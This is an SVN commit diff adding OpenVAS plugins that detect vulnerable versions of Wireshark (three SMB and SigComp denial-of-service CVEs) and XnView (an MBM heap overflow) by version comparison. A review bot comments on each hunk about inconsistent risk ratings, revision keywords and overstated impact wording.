+ script_id(902198);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2286");
+ script_tag(name:"cvss_base", value:"3.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Win)");
+ desc = "
+ Overview: This host is installed with Wireshark and is prone to Denial of
+ Service vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by an off-by-one error within the SigComp Universal
+ Decompressor Virtual Machine, which could be exploited by attackers to
+ crash an affected application or execute arbitrary code via unknown vectors.
+
+ Impact:
+ Successful exploitation will allow the attackers to crash an affected application.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Wireshark version 0.10.7 through 1.0.13 and 1.2.0 through 1.2.8
+
+ Fix: Upgrade to Wireshark version 1.0.14 or 1.2.9:
+ For updates refer, http://www.wireshark.org/download.html
+
+ References:
+ http://secunia.com/advisories/40112
+ http://www.vupen.com/english/advisories/2010/1418
+ http://www.wireshark.org/security/wnpa-sec-2010-05.html
+ http://www.wireshark.org/security/wnpa-sec-2010-06.html
+ http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+ script_description(desc);
+ script_summary("Check for the version of Wireshark");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPod");
+ script_family("Denial of Service");
+ script_dependencies("gb_wireshark_detect_win.nasl");
+ script_require_keys("Wireshark/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+ exit(0);
+}
+
+# Check for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+ version_in_range(version:sharkVer, test_version:"0.10.7", test_version2:"1.0.13")){
+ security_warning(0);
+}
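Review bot: The Vulnerability Insight text says the off-by-one can be used to "crash an affected application or execute arbitrary code", but the script sets `cvss_base` to 3.3 with risk factor Medium, files itself under "Denial of Service" and reports through `security_warning`. The text and the rating disagree, and which one is right cannot be decided from this hunk. Either drop the code-execution wording from the description or raise the score and reporting call to match it, so the report does not understate or overstate the finding.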
Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wireshark_smb_dissector_dos_vuln_win.nasl 9679 2010-06-17 14:09:24Z jun $
+#
+# Wireshark SMB dissector Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902196);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2283");
+ script_tag(name:"cvss_base", value:"3.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Wireshark SMB dissector Denial of Service Vulnerability (Windows)");
+ desc = "
+ Overview: This host is installed with Wireshark and is prone to Denial of
+ Service vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by a NULL pointer dereference error in the 'SMB' dissector,
+ which could be exploited to crash an affected application via unknown vectors.
+
+ Impact:
+ Successful exploitation will allow the attackers to crash an affected
+ application.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Wireshark version 0.99.6 through 1.0.13, and 1.2.0 through 1.2.8
+
+ Fix: Upgrade to Wireshark version 1.0.14 or 1.2.9:
+ For updates refer, http://www.wireshark.org/download.html
+
+ References:
+ http://secunia.com/advisories/40112
+ http://www.vupen.com/english/advisories/2010/1418
+ http://www.wireshark.org/security/wnpa-sec-2010-05.html
+ http://www.wireshark.org/security/wnpa-sec-2010-06.html
+ http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+ script_description(desc);
+ script_summary("Check for the version of Wireshark");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPod");
+ script_family("Denial of Service");
+ script_dependencies("gb_wireshark_detect_win.nasl");
+ script_require_keys("Wireshark/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+ exit(0);
+}
+
+# Check for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+ version_in_range(version:sharkVer, test_version:"0.99.6", test_version2:"1.0.13")){
+ security_warning(0);
+}
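Review bot: The tags `script_tag(name:"cvss_base", value:"3.3")` and `script_tag(name:"risk_factor", value:"Medium")` disagree, because under the CVSS v2 bands a 3.3 base score is Low, and the finding is then raised with `security_warning(0)`. Either change the tag to `script_tag(name:"risk_factor", value:"Low");` or add a comment explaining why a NULL pointer dereference crash is rated Medium here, so scan results are not over-prioritised. The SMB PIPE plugin in the next hunk carries the same pair of tags.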
Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl 9679 2010-06-17 14:09:24Z jun $
+#
+# Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902197);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2285");
+ script_tag(name:"cvss_base", value:"3.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows)");
+ desc = "
+ Overview: This host is installed with Wireshark and is prone to Denial of
+ Service vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by a NULL pointer dereference error in the 'SMB PIPE'
+ dissector, which could be exploited to crash an affected application via
+ unknown vectors.
+
+ Impact:
+ Successful exploitation will allow the attackers to crash an affected
+ application.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Wireshark version 0.8.20 to 1.0.13 and 1.2.0 to 1.2.8
+
+ Fix: Upgrade to Wireshark version 1.0.14 or 1.2.9:
+ For updates refer, http://www.wireshark.org/download.html
+
+ References:
+ http://secunia.com/advisories/40112
+ http://www.vupen.com/english/advisories/2010/1418
+ http://www.wireshark.org/security/wnpa-sec-2010-05.html
+ http://www.wireshark.org/security/wnpa-sec-2010-06.html
+ http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+ script_description(desc);
+ script_summary("Check for the version of Wireshark");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPod");
+ script_family("Denial of Service");
+ script_dependencies("gb_wireshark_detect_win.nasl");
+ script_require_keys("Wireshark/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+ exit(0);
+}
+
+# Check for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+ version_in_range(version:sharkVer, test_version:"0.8.20", test_version2:"1.0.13")){
+ security_warning(0);
+}
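Review bot: `script_version("$Revision$: 1.0");` mixes an SVN keyword with a hand-written suffix. The property block after this hunk sets `svn:keywords` to `Revision`, so after expansion the string would presumably read something like `$Revision: 8127 $: 1.0`. I would keep only the keyword, `script_version("$Revision$");`, so the plugin version shown in scan results is unambiguous. The same line appears in the SMB dissector plugin and in both XnView plugins in this commit.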
Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerabilities Test
+# $Id: secpod_xnview_mbm_bof_vuln_lin.nasl 9700 2010-06-18 16:21:45Z jun $
+#
+# XnView 'MBM' Processing Buffer Overflow Vulnerability (Linux)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902074);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-1932");
+ script_bugtraq_id("40852");
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_name("XnView 'MBM' Processing Buffer Overflow Vulnerability (Linux)");
+ desc = "
+ Overview: This host has XnView installed and is prone to buffer overflow
+ vulnerability.
+
+ Vulnerabilities Insight:
+ The flaw is due to improper bounds checking when processing 'MBM' (MultiBitMap)
+ files, which could be exploited to cause a heap overflow.
+
+ Impact:
+ Successful exploitation will allow attackers to overflow a buffer and execute
+ arbitrary code on the system with elevated privileges or cause the application
+ to crash.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ XnView versions prior to 1.97.5 on linux
+
+ Fix: Update to XnView version 1.97.5
+ For updates refer, http://www.xnview.com/
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/59421
+ http://www.vupen.com/english/advisories/2010/1468
+ http://securitytracker.com/alerts/2010/Jun/1024100.html
+ http://www.coresecurity.com/content/XnView-MBM-Processing-Heap-Overflow ";
+
+ script_description(desc);
+ script_summary("Check for the version of XnView");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPod");
+ script_family("Buffer overflow");
+ script_dependencies("secpod_xnview_detect_lin.nasl");
+ script_require_keys("XnView/Linux/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get XnView Version from he KB
+xnviewVer = get_kb_item("XnView/Linux/Ver");
+if(xnviewVer != NULL)
+{
+ ## Check for XnView version less than 1.97.5
+ if(version_is_less(version:xnviewVer, test_version:"1.97.5")){
+ security_hole(0);
+ }
+}
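Review bot: The threshold in `version_is_less(version:xnviewVer, test_version:"1.97.5")` is the same one the Windows plugin uses, and nothing in this hunk shows that the Linux builds follow the Windows version numbering. If they do not, the check would flag every Linux install, or keep flagging a fixed one, and it reports through `security_hole(0)` with a 9.3 score. Please confirm the fixed Linux release against the vendor advisory and record it above the check, for example `## Fixed Linux build: <version per vendor advisory>`.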
Property changes on: trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerabilities Test
+# $Id: secpod_xnview_mbm_bof_vuln_win.nasl 9700 2010-06-18 17:11:45Z jun $
+#
+# XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902075);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-1932");
+ script_bugtraq_id("40852");
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_name("XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows)");
+ desc = "
+ Overview: This host has XnView installed and is prone to buffer overflow
+ vulnerability.
+
+ Vulnerabilities Insight:
+ The flaw is due to improper bounds checking when processing 'MBM' (MultiBitMap)
+ files, which could be exploited to cause a heap overflow.
+
+ Impact:
+ Successful exploitation will allow attackers to overflow a buffer and execute
+ arbitrary code on the system with elevated privileges or cause the application
+ to crash.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ XnView versions prior to 1.97.5 on windows
+
+ Fix: Update to XnView version 1.97.5
+ For updates refer, http://www.xnview.com/
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/59421
+ http://www.vupen.com/english/advisories/2010/1468
+ http://securitytracker.com/alerts/2010/Jun/1024100.html
+ http://www.coresecurity.com/content/XnView-MBM-Processing-Heap-Overflow ";
+
+ script_description(desc);
+ script_summary("Check for the version of XnView");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPod");
+ script_family("Buffer overflow");
+ script_dependencies("secpod_xnview_detect_win.nasl");
+ script_require_keys("XnView/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get XnView from KB
+xnviewVer = get_kb_item("XnView/Win/Ver");
+if(xnviewVer != NULL)
+{
+ ## Check for XnView version less than 1.97.5
+ if(version_is_less(version:xnviewVer, test_version:"1.97.5")){
+ security_hole(0);
+ }
+}
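Review bot: The Impact text says attackers can `execute arbitrary code on the system with elevated privileges`, which the insight section does not support. A heap overflow while processing an 'MBM' file would presumably run code with the rights of the user who opened the file, not with raised ones. I would reword it to `execute arbitrary code in the context of the user running XnView or cause the application to crash`, so readers do not triage this as a privilege-escalation finding. The Linux plugin's description in the previous hunk has the same sentence.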
Property changes on: trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision